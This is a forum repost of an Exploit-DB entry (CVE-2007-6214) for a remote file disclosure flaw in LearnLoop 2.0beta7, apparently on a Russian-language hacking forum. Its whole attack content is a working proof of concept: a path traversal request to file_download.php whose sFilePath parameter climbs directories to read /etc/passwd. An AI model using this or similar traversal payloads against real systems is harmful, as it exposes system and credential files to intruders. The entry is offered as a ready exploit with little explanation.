Exploit LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4680
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-6214
Дата публикации
2007-11-29
Код:
LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

# milw0rm.com [2007-11-29]
 
Источник
www.exploit-db.com